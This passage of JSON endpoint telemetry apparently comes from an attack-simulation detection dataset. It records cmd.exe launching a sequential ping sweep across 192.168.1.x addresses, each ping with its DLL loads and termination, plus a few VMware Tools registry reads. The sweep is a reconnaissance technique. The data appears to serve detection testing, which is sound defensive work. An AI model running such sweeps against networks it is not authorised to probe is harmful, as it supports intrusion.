"timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572022140000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "event_type": "process", - "pid": 4412, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572026840000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.9", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572026980000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572026990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "event_type": "process", - "pid": 5688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572031990000, - "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.10", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 904, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572032130000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572032140000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "event_type": "process", - "pid": 904, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572036840000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.11", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6288, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572036980000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572036990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "event_type": "process", - "pid": 6288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572041990000, - "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.12", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572042130000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572041990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572042140000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "event_type": "process", - "pid": 1688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572046830000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.13", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1340, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572047029984, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572046990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572049020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572049020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572049020000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 1340, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572051990000, - "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.14", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3452, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572052140000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "event_type": "process", - "pid": 3452, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572056840000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.15", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5572, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572056980000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572056990000, - "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" - }, - { - 